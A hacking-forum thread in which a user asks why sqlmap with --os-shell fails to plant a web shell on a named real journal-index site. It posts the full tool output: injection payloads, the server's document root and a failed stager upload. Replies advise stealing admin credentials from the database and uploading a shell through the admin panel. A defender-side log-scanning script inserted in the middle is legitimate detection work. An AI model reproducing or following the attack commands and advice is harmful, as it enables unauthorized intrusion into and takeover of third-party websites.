I can't upload a shell with SQLmap

MagmaCrocodile

Hello friends. I'm MagmaCrocodile. No matter how hard I try, and even though there is no source left on the internet that I haven't looked at, I just can't upload a shell with sqlmap...

The command I entered: python2 sqlmap.py --flush-session -u Eurasian Scientific Journal Index --data="id=14" --os-shell
Output:
[04:10:23] [INFO] testing connection to the target URL
[04:10:24] [INFO] heuristics detected web page charset 'UTF-8-SIG'
[04:10:24] [INFO] checking if the target is protected by some kind of WAF/IPS
[04:10:24] [INFO] testing if the target URL content is stable
[04:10:25] [INFO] target URL content is stable
[04:10:25] [INFO] testing if GET parameter 'id' is dynamic
[04:10:25] [INFO] GET parameter 'id' appears to be dynamic
[04:10:25] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[04:10:25] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads sp
for the remaining tests, do you want to include all tests for 'MySQL' extending
[04:10:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[04:10:29] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[04:10:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[04:10:34] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable (with --string="OF")
[04:10:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[04:10:34] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[04:10:34] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[04:10:35] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[04:10:35] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[04:10:35] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[04:10:35] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:35] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:10:36] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[04:10:36] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[04:10:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[04:10:37] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[04:10:37] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[04:10:37] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[04:10:37] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[04:10:37] [INFO] testing 'MySQL inline queries'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[04:10:38] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[04:10:38] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[04:10:39] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[04:10:39] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[04:10:49] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[04:10:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[04:10:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[04:10:49] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[04:10:50] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[04:10:51] [INFO] target URL appears to have 22 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[04:11:30] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[04:11:35] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[04:11:39] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[04:11:43] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[04:11:47] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[04:12:18] [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests
[04:12:18] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[04:12:21] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[04:12:25] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[04:12:30] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[04:12:34] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[04:12:38] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[04:12:42] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[04:12:44] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any
sqlmap identified the following injection point(s) with a total of 451 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: id=14' AND 2318=2318#

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=14' AND SLEEP(5)-- Jpym
---
[04:12:47] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12
[04:12:47] [INFO] going to use a web backdoor for command prompt
[04:12:47] [INFO] fingerprinting the back-end DBMS operating system
[04:12:47] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[04:12:49] [INFO] retrieved the web server document root: '/home/users/p/pasha369/domains/esjindex.org'
[04:12:49] [INFO] retrieved web server absolute paths: '/home/users/p/pasha369/domains/esjindex.org/search.php'
[04:12:49] [INFO] trying to upload the file stager on '/home/users/p/pasha369/domains/esjindex.org/' via LIMIT 'LINES TERMINATED BY' method
[04:12:51] [WARNING] unable to upload the file stager on '/home/users/p/pasha369/domains/esjindex.org/'
[04:12:51] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 1 times, 404 (Not Found) - 7 times
[04:12:51] [INFO] fetched data logged to text files under '/home/magmacrocodile/.sqlmap/output/esjindex.org'
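
A defender-side view of the run above, as an added example that is not part of the original thread: it scans web access-log lines for the probe classes named in the sqlmap output (boolean-based blind, time-based blind, UNION, and the 'LINES TERMINATED BY' file write) and groups them per client. The log lines, IP addresses, file path and user-agent version are constructed, and it assumes payloads arrive in the query string of a combined-format log.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Apache/Nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# One pattern per probe class that appears in the sqlmap output above.
SIGNATURES = {
    # ' AND 2318=2318#  (quote break followed by a numeric tautology)
    "boolean_blind": re.compile(r"'\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I),
    # ' AND SLEEP(5)--
    "time_blind": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "union_probe": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    # file-stager write: ... INTO OUTFILE '...' LINES TERMINATED BY 0x...
    "file_write": re.compile(
        r"\bINTO\s+(?:OUT|DUMP)FILE\b|\bLINES\s+TERMINATED\s+BY\b", re.I),
}

# Constructed sample lines (documentation IP ranges, made-up path and sizes).
SAMPLE_LOG = [
    '198.51.100.20 - - [01/Jan/2024:10:00:01 +0000] "GET /search.php?id=14 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.20 - - [01/Jan/2024:10:00:02 +0000] "GET /search.php?q=sleep+and+health HTTP/1.1" 200 4200 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [01/Jan/2024:10:00:05 +0000] "GET /search.php?id=14%27%20AND%202318%3D2318%23 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [01/Jan/2024:10:00:06 +0000] "GET /search.php?id=14%27%20AND%20SLEEP%285%29--%20Jpym HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [01/Jan/2024:10:00:07 +0000] "GET /search.php?id=14%27%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 200 310 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /search.php?id=14%27%20LIMIT%200%2C1%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fhtml%2Ftmpstage.php%27%20LINES%20TERMINATED%20BY%200x41424344--%20- HTTP/1.1" 403 199 "-" "sqlmap/1.7#stable (https://sqlmap.org)"',
]


def classify(line):
    """Return (ip, status, set_of_signature_names) or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    # Decode %xx and '+' so the patterns see what the application received.
    query = unquote_plus(m["target"].partition("?")[2])
    hits = {name for name, rx in SIGNATURES.items() if rx.search(query)}
    if "sqlmap/" in m["ua"].lower():  # default UA; trivially changed, weak signal
        hits.add("sqlmap_user_agent")
    return m["ip"], int(m["status"]), hits


def summarize(lines):
    """Group hits per client IP; clients with no hits are left out."""
    report = defaultdict(
        lambda: {"requests": 0, "hits": set(), "file_write_statuses": []})
    for line in lines:
        parsed = classify(line)
        if parsed is None:
            continue
        ip, status, hits = parsed
        entry = report[ip]
        entry["requests"] += 1
        entry["hits"] |= hits
        if "file_write" in hits:
            # The status shows whether the write attempt was blocked upstream.
            entry["file_write_statuses"].append(status)
    return {ip: e for ip, e in report.items() if e["hits"]}


if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE_LOG).items():
        print(ip, entry["requests"], sorted(entry["hits"]),
              entry["file_write_statuses"])
```

Payloads sent in a POST body do not appear in an access log, so covering them needs request-body logging in the application or at a WAF.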
 

louise0357

Hello, first of all, you can't upload a shell directly with sqlmap on every site. Instead, you can pull the admin credentials from the database, find the admin panel, and upload it from the admin panel. If you run into any problem, you can write here.

Our friend is right; sites where a shell can be uploaded with sqlmap are not that common.
Also, don't bother with this site at all; I couldn't pull anything, it's a waste of time.
:D